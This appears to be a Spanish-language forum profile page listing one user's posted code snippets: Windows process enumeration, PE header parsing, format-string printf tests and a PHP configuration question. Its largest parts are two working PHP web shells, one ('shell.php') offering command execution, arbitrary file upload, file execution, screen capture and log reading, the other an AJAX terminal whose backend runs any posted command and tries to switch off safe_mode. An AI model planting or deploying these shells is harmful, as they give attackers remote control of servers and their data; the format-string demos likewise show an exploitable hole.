f
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menú
HANDLE snapshot,snapshotModule=NULL;
PROCESSENTRY32 processEntry;
MODULEENTRY32 moduleEntry;
if((snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0))==NULL){
printf("\n%s","FAIL!!!!SNAPSHOTCREATE");
return 0;
}
processEntry.dwSize=sizeof(PROCESSENTRY32);
moduleEntry.dwSize=sizeof(MODULEENTRY32);
while(Process32Next(snapshot,&processEntry)==TRUE)
{
printf("\nPID:%d\nExe:%s\n",processEntry.th32ProcessID,processEntry.szExeFile);
if(snapshotModule=CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,processEntry.th32ProcessID))
{
while(Module32Next(snapshotModule,&moduleEntry)==TRUE)
printf("%s %s %d\n",moduleEntry.szModule,moduleEntry.szExePath,moduleEntry.th32ProcessID);
}
}
return 0;
#include <stdio.h>
#include <windows.h>
int main(int argc,char**argv)
{
PIMAGE_DOS_HEADER dosHeader;
PIMAGE_NT_HEADERS ntHeader;
HANDLE handleArchivo,mapeadoArchivo=NULL;
LPVOID direccionMapeado=NULL;
char nombreArchivo[MAX_PATH];
printf("Ingrese el archivo:");
scanf("%s",nombreArchivo);
/*
HANDLE WINAPI CreateFile(
_In_ LPCTSTR lpFileName,
_In_ DWORD dwDesiredAccess,
_In_ DWORD dwShareMode,
_In_opt_ LPSECURITY_ATTRIBUTES lpSecurityAttributes,
_In_ DWORD dwCreationDisposition,
_In_ DWORD dwFlagsAndAttributes,
_In_opt_ HANDLE hTemplateFile
);
*/
handleArchivo=CreateFile(nombreArchivo,GENERIC_READ,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(handleArchivo==INVALID_HANDLE_VALUE)
{
printf("\n%s\n","Error!");
return 0;
}
/*
HANDLE WINAPI CreateFileMapping(
_In_ HANDLE hFile,
_In_opt_ LPSECURITY_ATTRIBUTES lpAttributes,
_In_ DWORD flProtect,
_In_ DWORD dwMaximumSizeHigh,
_In_ DWORD dwMaximumSizeLow,
_In_opt_ LPCTSTR lpName
);
*/
mapeadoArchivo=CreateFileMapping(handleArchivo,NULL,PAGE_READONLY,0,0,NULL);
if(!mapeadoArchivo)
{
printf("\n%s\n","Error!");
return 0;
}
/*
LPVOID WINAPI MapViewOfFile(
_In_ HANDLE hFileMappingObject,
_In_ DWORD dwDesiredAccess,
_In_ DWORD dwFileOffsetHigh,
_In_ DWORD dwFileOffsetLow,
_In_ SIZE_T dwNumberOfBytesToMap
);
*/
direccionMapeado=MapViewOfFile(mapeadoArchivo,FILE_MAP_READ,0,0,0);
dosHeader=(PIMAGE_DOS_HEADER)direccionMapeado;
printf("\n%x MZ , PE Header offset :0x%x\n",dosHeader->e_magic,dosHeader->e_lfanew);
ntHeader=(PIMAGE_NT_HEADERS)(direccionMapeado+dosHeader->e_lfanew);
printf("PE SIGNATURE:%x Machine:%x",ntHeader->Signature,ntHeader->FileHeader.Machine);
printf("\nDireccion Mapeado:%x ImageBase:%x",direccionMapeado,ntHeader->OptionalHeader.ImageBase);
char a[MAX_PATH];
scanf("%s",a);
}
#include <stdio.h>
#include <windows.h>
int main(int argc,char **argv)
{
typedef int (*punteroExitProcess)(UINT);
typedef int (*punteroBeep)(DWORD,DWORD);
typedef DWORD (*punteroGetCurrentProcessId)(void);
HMODULE dirKernel32=GetModuleHandle("kernel32.dll");
punteroExitProcess punteroExit=NULL;
punteroBeep punteroBep=NULL;
punteroGetCurrentProcessId GetCurrentProcessId2=NULL;
punteroExit=(punteroExitProcess)GetProcAddress(dirKernel32,"ExitProcess");
punteroBep=(punteroBeep)GetProcAddress(dirKernel32,"Beep");
GetCurrentProcessId2=(punteroGetCurrentProcessId)GetProcAddress(dirKernel32,"GetCurrentProcessId");
printf("Kernel32:%p\nExitProcess:%p\nBeep:%p\nGetCurrentProcessId:%p\n",dirKernel32,punteroExit,punteroBep,GetCurrentProcessId2);
printf("PID=%d\n",GetCurrentProcessId2());
punteroBep(1000,3000);
punteroExit(0);
}
<?php
echo "<form method='POST' action='shell.php'>Origen:<input type='text' name='copiar_origen' /><br/>
Destino:<input type='text' name='copiar_destino' /><br/>
<input type='submit' value='Copiar'/></form>";
/*Copiar!*/
if((@$_POST['copiar_destino'] && @$_POST['copiar_origen'])!="")
{
$destino=$_POST['copiar_destino'];
$origen=$_POST['copiar_origen'];
if(copy($origen,$destino))
{
echo "Se copio.";
}
else
{
echo "No se copio";
}
}
echo "<form method='POST' action='shell.php'>
<input type='text' name='directorio' id='directorio'/>
<input type='submit' value='Listar'/>
</form>
";
/*Directorio*/
if(@$_POST['directorio']!="")
{
$directorio_actual=$_POST['directorio'];
echo $directorio_actual;
if(is_dir($directorio_actual))
{
$directorio=opendir($directorio_actual);
echo "<br/><h1>Archivos del directorio</h1><ul>";
while(false!==($archivo=readdir($directorio)))
{
$rutaentera=$directorio_actual.DIRECTORY_SEPARATOR.$archivo;
if(is_dir($rutaentera))
{
echo "<li onClick="."\"document.getElementById('directorio').value='".$directorio_actual.DIRECTORY_SEPARATOR.$archivo."'\">".$archivo.' Tipo:directorio</li>';
}
else
{
echo $archivo." Tamano:".filesize($rutaentera)." bytes. Tipo:".filetype($rutaentera)."<br />";
}
}
echo "</ul>";
}
closedir($directorio_actual);
}
/*Comandos*/
echo "<form method='POST' action='shell.php'>
Comando:<input type='text' name='comando' /><input type='submit' value='Enviar'/><br/>
Exec<input type='radio' name='ph' value='exec'/><br/>
System<input type='radio' name='ph' value='system'/><br/>
</form>";
if(@$_POST['comando']!="")
{
$comando=$_POST['comando'];
if(($_POST["ph"])=="exec")
{
echo exec($comando);
}
else if(($_POST["ph"])=="system")
{
system($comando,$resultado);
echo "<pre>".$resultado."</pre>";
}
}
/*Ejecutar archivos*/
echo "<form method='POST' action='shell.php'>
Archivo:<input type='text' name='archivo'/>
<input type='submit' value='Ejecutar'/>";
if(@$_POST['archivo']!="")
{
if(pclose(popen($_POST['archivo'],"r")))
{
echo "Se ejecuto.";
}
else
{
echo "No se ejecuto";
}
}
/*Informacion*/
echo "<br/>Informacion:".
"<br/><form method='POST' action='shell.php'>
PHP.INI<input type='radio' name='info' value='phpini'><br/>
ID PROCESO<input type='radio' name='info' value='proceso'><br/>
Nombre usuario<input type='radio' name='info' value='usuario'><br/>
Constantes Definidas<input type='radio' name='info' value='defcon'><br/>
PHPINFO<input type='radio' name='info' value='phpinfo'><br/>
Version Apache<input type='radio' name='info' value='apachever'><br/>
<input type='submit' value='Obtener!'/></form>";
if(@$_POST['info']=="phpini")
{
echo "Direccion del phpini".php_ini_loaded_file();
echo "<pre>";
print_r(ini_get_all());
echo "</pre>";
}
else if(@$_POST['info']=="proceso")
{
echo "Id proceso php:".getmypid();
}
else if(@$_POST['info']=="usuario")
{
echo "Usuario:".get_current_user();
}
else if(@$_POST['info']=="defcon")
{
echo "<pre>";
print_r(get_defined_constants());
echo "</pre>";
}
else if(@$_POST['info']=="apachever")
{
echo apache_get_version();
}
else if(@$_POST['info']=="phpinfo")
{
echo phpinfo();
}
/*Subir archivo*/
echo "<form method='POST' action='shell.php' enctype='multipart/form-data'>
Archivo:<input type='file' name='subirarchivo'>
<input type='submit' name='subir' value='Subir!'/>
</form>";
if(isset($_POST['subir']))
{
$nombre=$_FILES["subirarchivo"]['name'];
$tamano=$_FILES["subirarchivo"]['size'];
if(copy($_FILES['subirarchivo']['tmp_name'],$nombre))
{
echo "Se subio";
}
else
{
echo "fail";
}
}
/*Safe mode*/
if(ini_get('safe_mode'))
{
echo "Safe mode:On";
}
else
{
echo "Safe mode:Off";
}
echo "<br/>IP:".$_SERVER['SERVER_ADDR'];
/*Espacio disco*/
echo "<form method='POST' action='shell.php'>
Espacio libre en el disco de:<input type='text' name='ruta' />
<input type='submit' name='bytes' value='Bytes'/>
</form>
";
if(isset($_POST['bytes']))
{
$bytes=disk_free_space($_POST['ruta']);
$bits=$bytes*8;
$kb=$bytes/1024;
$mb=$kb/1024;
$gb=$mb/1024;
echo "<br/>Bits:".$bits."<br/>Bytes:".$bytes."<br/>Kbytes:".$kb."<br/>Mbytes:".$mb."<br/>Gbytes:".$gb;
}
echo "<form method='POST' action='shell.php'>
Espacio total del disco:<input type='text' name='ruta2'/>
<input type='submit' name='total' value='TOTAL'/>
</form>
";
if(isset($_POST['total']))
{
$bytes=disk_total_space($_POST['ruta2']);
$bits=$bytes*8;
$kbytes=$bytes/1024;
$mbytes=$kbytes/1024;
$gbytes=$mbytes/1024;
echo "<br/>Bits:".$bits."<br/>Bytes:".$bytes."<br/>Kbytes:".$kbytes."<br/>Mbytes:".$mbytes."<br/>GBytes:".$gbytes;
}
echo PHP_OS;
if(stristr(PHP_OS,'WIN'))
{
echo "<form method='POST' action='shell.php'>
Direccion donde guardar foto:<input type='text' name='foto'/>
<input type='submit' name='sacar' value='Sacar foto'/>
<br/>PNG<input type='radio' name='tipoimagen' value='png'/>
<br/>JPG<input type='radio' name='tipoimagen' value='jpeg'/>
<br/>GIF<input type='radio' name='tipoimagen' value='gif'/>
<br/>Mostrar<input type='checkbox' name='mostrar'/>
</form>";
if(isset($_POST['sacar'])&& isset($_POST['tipoimagen']))
{
$imagen=imagegrabscreen();
$tipoimagen=$_POST['tipoimagen'];
$direccion=(stristr($_POST['foto'],'.'.$tipoimagen))?$_POST['foto']:$_POST['foto'].'.'.$tipoimagen;
$seteado=isset($_POST['mostrar']);
if($tipoimagen=="png")
{
imagepng($imagen,$direccion);
if($seteado)echo "<br/><img src=\"".$direccion."\"></br>";
}else if($tipoimagen=="jpeg")
{
imagejpeg($imagen,$direccion);
if($seteado)echo "<br/><img src=\"".$direccion."\"></br>";
}
else if($tipoimagen=="gif")
{
imagegif($imagen,$direccion);
if($seteado)echo "<br/><img src=\"".$direccion."\"></br>";
}
imagedestroy($imagen);
}
}
if(stristr($_SERVER['SERVER_SOFTWARE'],"apache"))
{
echo "<form method='post' action='shell.php'/>
Directorio apache:<input type='text' name='directorioo'/><br/>
<input type='submit' name='guachen' value='Mostrar'/>
</form>";
if((isset($_POST['guachen']) && $_POST['directorioo']!=""))
{
$directorio=($_POST['directorioo']).DIRECTORY_SEPARATOR."logs".DIRECTORY_SEPARATOR;
function mostrar($esa)
{
$directorio=($_POST['directorioo']).DIRECTORY_SEPARATOR."logs".DIRECTORY_SEPARATOR;
$handle=fopen($directorio.$esa,"r");
while(!feof($handle))
echo "<br/>".fgets($handle);
fclose($handle);
}
echo "Access log:";
if(file_exists($directorio."access.log"))
{
mostrar("access.log");
}else{
"No existe<br/>";
}
echo "Error log:";
if(file_exists($directorio."error.log"))
{
mostrar("error.log");
}
else
{
echo "No existe.<br/>";
}
if(file_exists($directorio."install.log"))
{
mostrar("install.log");
}
else
{
echo "No existe.<br/>";
}
}
}
?>
#include <stdio.h>
int main()
{
char hola[]="AAAA";
printf(hola);
}
#include <stdio.h>
int main()
{
char hola[]="AAAA %p %p %p %p %p";
printf(hola);
}
#include <stdio.h>
main()
{
int i,array1[5]={0,1,2,3,4};
int* ptrArray1;
ptrArray1=array1;
for(i=0;i<5;i++)
printf("\nDesplazamiento del puntero por el array %d.Direccion: %p",*(ptrArray1+i),(ptrArray1+i));
}
int iFil = 0, iCol = 0;
socket.Receive(bytes);
iFil = System.Convert.ToInt32(System.Text.Encoding.ASCII.GetString(bytes));
socket.Receive(bytes);
iCol = System.Convert.ToInt32(System.Text.Encoding.ASCII.GetString(bytes));
<?php
echo ini_get('allow_url_include'); //Perfecto deberia devolver 1
ini_set('allow_url_include',0);
echo ini_get('allow_url_include'); //Deberia devolver 0 , pero devuelve 1..
?>
<html>
<head>
<style type="text/css">
body
{
font-size:1.2em;
font-family:"Lucida Console", Lucida, monospace;
font-style:italic;
background-color:black;
color:yellow;
margin:10px;
padding:0px;
}
#jed
{
color:red;
font-family:"Lucida Console", Lucida, monospace;
}
#miDiv
{
color:red;
font-family:"Lucida Console", Lucida, monospace;
font-size:1.2em;
font-style:italic;
}
#comando
{
color:red;
border:none;
font-size:1.2em;
font-style:italic;
background-color:black;
font-family:"Lucida Console", Lucida, monospace;
}
</style>
<script>
function validar(e)
{
if(document.all)
{
tecla=e.keyCode;
}
else
{
tecla=e.which;
}
if(tecla==13)
{
ajax();
}
}
function ajax()
{
var xmlhttp;
t1=document.getElementById('comando').value;
if(window.XMLHttpRequest)
{
xmlhttp=new XMLHttpRequest();
}
else
{
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{
document.getElementById("miDiv").innerHTML=xmlhttp.responseText;
}
}
xmlhttp.open("POST","comando.php",true);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("comando="+t1);
}
</script>
</head>
<body>
Written by J3dN4k! Argentinian4EVER.
twitter/jednakk<br /><br />
<div id="jed">J3dN4k><input type="text" id="comando" name="comando" onkeypress="validar(event)"></input>
<!--<button type="button" onclick="ajax()">Enviar</button><br />-->
</div>
<b>
<div id="miDiv">
</div>
</b>
</body>
</html>
<?php
$q=$_POST['comando'];
if(ini_get('safe_mode'))
{
ini_set('safe_mode','0');
}
if(function_exists('shell_exec'))
{
$result=shell_exec($q);
}
elseif(function_exists('exec'))
{
exec($q,$result);
}
elseif(function_exists('system'))
{
system($q,$result);
}
else
{
$result="Todas las funciones de ejecutar comandos estan deshabilitadas por el server";
}
if(strlen($result)>0)
{
$response=$result;
}
else
{
$response="Usted ha introducido un comando erroneo !(Bad command)";
}
echo "<pre>".$response."<br />J3dN4k></pre>";
?>